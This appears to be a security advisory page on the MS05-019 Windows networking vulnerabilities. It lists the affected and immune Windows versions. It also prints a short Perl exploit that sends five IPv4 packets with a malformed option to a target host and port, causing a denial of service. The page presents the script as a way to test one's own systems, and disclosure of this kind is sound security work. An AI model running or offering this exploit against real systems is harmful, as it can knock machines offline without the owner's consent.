|
Brought to you by:
Suppliers of:
|
|
|
| |
| Number of networking related vulnerabilities fixed by MS05-019 security update were reported by Microsoft. Those vulnerabilities are: IP Validation, ICMP Connection Reset, ICMP Path MTU, TCP Connection Reset and Spoofed Connection Request. The following exploit code can be used to test the denial of service vulnerability. The following perl based exploit code can be used to test your system for the MS05-019 vulnerabilities. |
| |
Credit:
The information has been provided by GomoR.
More information about the advisory can be found at: http://www.securiteam.com/windowsntfocus/5IP0J0UFFM.html
|
| |
Vulnerable Systems:
* Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
* Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 for Itanium-based Systems
* Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)
Immune Systems:
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows XP Professional x64 Edition
Exploit:
#!/usr/bin/perl
use strict;
use warnings;
my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};
use Net::Pkt;
$Env->debug(3);
my $frame = Net::Packet::Frame->new(
l3 => Net::Packet::IPv4->new(
dst => $opts{t},
options => "\x03\x27". 'G'x38,
),
l4 => Net::Packet::TCP->new(
dst => $opts{p},
),
);
$frame->send for 1..5;
#EOF
|
|
|
|
|
